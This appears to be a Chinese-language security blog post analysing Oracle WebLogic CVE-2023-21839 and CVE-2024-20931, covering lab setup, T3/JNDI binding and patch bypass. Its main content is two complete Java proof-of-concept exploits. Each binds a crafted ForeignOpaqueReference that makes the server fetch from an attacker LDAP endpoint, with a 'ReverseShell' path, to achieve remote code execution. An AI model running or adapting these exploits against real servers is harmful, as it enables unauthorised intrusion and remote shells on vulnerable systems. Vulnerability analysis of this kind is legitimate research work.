weblogic CVE-2024-20931分析

weblogic 12.2.1.4.0安装

我的环境:ubuntu 22.04 + weblogic 12.2.1.4.0 + jdk8(注:weblogic不支持OpenJDK)

jdk下载安装:https://www.oracle.com/cn/java/technologies/downloads/archive/

weblogic下载安装:https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

JDK安装完成后装weblogic,简单配置账号密码等,一路下一步即可。

poc依赖包

wlfullclient.jar 包含了与 WebLogic Server 实例交互所需的客户端库。这些库提供了连接到 WebLogic Server、执行各种操作以及访问资源(如 JNDI、JMS、JDBC 等)所需的 API 和类。使用 wlfullclient.jar 文件时,通常需要将其包含在 Java 项目的类路径中。这样,您的应用程序就可以访问 WebLogic Server 客户端 API,并利用 WebLogic Server 提供的功能。

如何生成wlfullclient.jar?

java -jar /home/vpanda/Oracle/Middleware/Oracle_Home/wlserver/modules/com.bea.core.jarbuilder.jar

cd /home/vpanda/Oracle/Middleware/Oracle_Home/wlserver/server/lib/
#生成后在poc的时候作为client依赖包导入

weblogic远程debug调试环境

在setDomainEnv.sh添加,开启远程调试端口9999

debugFlag=true
DEBUG_PORT=9999

打包wlserver在调试环境导入项目后添加Remote JVM Debug

T3/IIOP协议

WebLogic T3/IIOP(T3 over IIOP)协议是 Oracle WebLogic Server 使用的一种通信协议。它结合了 WebLogic Server 的 T3 协议和 OMG(Object Management Group)定义的 IIOP(Internet Inter-ORB Protocol)协议。

T3 是 WebLogic Server 的专有协议,用于在 WebLogic Server 节点之间进行通信。它提供了高性能、可靠的通信机制,支持各种服务和功能,如远程方法调用(RMI)、Java Messaging Service(JMS)等。T3 协议是 WebLogic Server 的核心协议,用于实现集群、负载均衡、故障恢复等关键功能。

协议支持远程绑定对象(Remote Object Binding)到服务端。通过远程绑定,您可以将一个对象绑定到 WebLogic Server 上的命名服务(Naming Service),使得其他客户端可以通过名称来访问和使用该对象。

WebLogic Server 提供了 JNDI(Java Naming and Directory Interface)作为命名服务的实现。JNDI 是 Java 平台的标准 API,用于访问和管理命名和目录服务。通过 JNDI,您可以在 WebLogic Server 上创建和管理命名空间,并在其中绑定对象。

要将一个对象绑定到 WebLogic Server 上的命名服务,您需要执行以下步骤:

  1. 在 WebLogic Server 上配置和启动 JNDI 服务。这可以通过 WebLogic Server 的管理控制台或配置文件进行设置。
  2. 在客户端代码中,创建一个要绑定的对象,并将其绑定到 JNDI 上下文(Context)。您可以使用 Java 的 RMI(Remote Method Invocation)或其他远程调用机制来实现对象的远程访问。
  3. 在客户端代码中,通过 JNDI API 获取到 WebLogic Server 上的 JNDI 上下文。
  4. 在客户端代码中,使用 JNDI API 将对象绑定到 JNDI 上下文中的特定名称。
  5. 在客户端代码中,其他客户端可以通过 JNDI API 在 WebLogic Server 上查找并获取绑定的对象。

通过这种方式,您可以在 WebLogic Server 上实现对象的远程绑定,并使得其他客户端能够通过名称来访问和使用这些对象。这种方式非常适用于分布式系统和企业应用集成,可以实现跨平台、跨语言的对象通信和共享。

代码示例:

java 复制代码
import javax.naming.Context;
import javax.naming.InitialContext;
import java.util.Properties;

public class RemoteBindingExample {
    public static void main(String[] args) {
        try {
            // 设置 WebLogic Server 的连接属性
            Properties props = new Properties();
            props.setProperty(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
            props.setProperty(Context.PROVIDER_URL, "t3://localhost:7001");

            // 创建 JNDI 上下文
            Context context = new InitialContext(props);

            // 创建要绑定的对象
            MyRemoteObject remoteObject = new MyRemoteObject();

            // 将对象绑定到 JNDI 上下文中的特定名称
            context.rebind("myObject", remoteObject);

            System.out.println("对象绑定成功!");

            // 关闭 JNDI 上下文
            context.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

CVE-2023-21839

如果我们将remoteObject替换成一个ForeignOpaqueReference对象,由于ForeignOpaqueReference集成自OpaqueReference,进行lookup的时候会调用对象getReferent方法。最终会调用context.lookup(evalMacros(this.remoteJNDIName));

对remoteJNDIName值更改为ldap远程执行地址即可实现RCE。

另外加上jndiEnvironment的检测,所以ForeignOpaqueReference对象绑定时候,对remoteJNDIName值做反射修改即可。

java 复制代码
package org.example.CVE202321839;
import weblogic.deployment.jms.ForeignOpaqueReference;

import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Properties;

public class Main {
    public static void main(String[] args) throws Exception {

        Properties props = new Properties();
        props.setProperty(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        props.setProperty(Context.PROVIDER_URL, "t3://192.168.131.139:7001");

        Context context = new InitialContext(props);

        ForeignOpaqueReference f = new ForeignOpaqueReference();

        Field remoteJNDIName = ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        String ldap = "ldap://xxxxxx:1389/Basic/ReverseShell/xxxx/12345";
        remoteJNDIName.set(f, ldap);

        context.rebind("sectest", f);
        try {
            context.lookup("sectest");
        } catch (Exception e) {
        }
    }
}

CVE-2023-21839补丁限制

补丁对ForeignOpaqueReference的jndiEnvironment和remoteJNDIName都做了限制。

CVE-2024-20931

INITIAL_CONTEXT_FACTORY 是 JNDI API 中的一个常量,用于指定要使用的初始上下文工厂类。它在创建 JNDI 上下文对象时使用,用于指定要使用的上下文工厂类。AQjmsInitialContextFactory在初始化的时候,需要通过JNDI去获取远程的DataSource,通过这个初始化也可以发起JNDI注入。

java 复制代码
package org.example.CVE202420931;
import weblogic.deployment.jms.ForeignOpaqueReference;

import javax.naming.Context;
import javax.naming.InitialContext;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Properties;

public class Main {
    public static void main(String[] args) throws Exception {

        Properties props = new Properties();
        props.setProperty(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        props.setProperty(Context.PROVIDER_URL, "t3://192.168.131.139:7001");

        Context context = new InitialContext(props);

        Hashtable env2 = new Hashtable();
        env2.put("java.naming.factory.initial", "oracle.jms.AQjmsInitialContextFactory");
        env2.put("datasource", "ldap://xxxxx:1389/Basic/ReverseShell/xxxx/12347");
        ForeignOpaqueReference f = new ForeignOpaqueReference();
        Field jndiEnvironment = ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f, env2);

        context.rebind("sectest", f);
        try {
            context.lookup("sectest");
        } catch (Exception e) {
        }
    }
}

参考链接:

1.https://www.oracle.com/security-alerts/cpujan2024verbose.html

2.https://glassyamadeus.github.io/2024/01/31/CVE_2024_20931/

更多关于云计算与安全内容,请关注公众号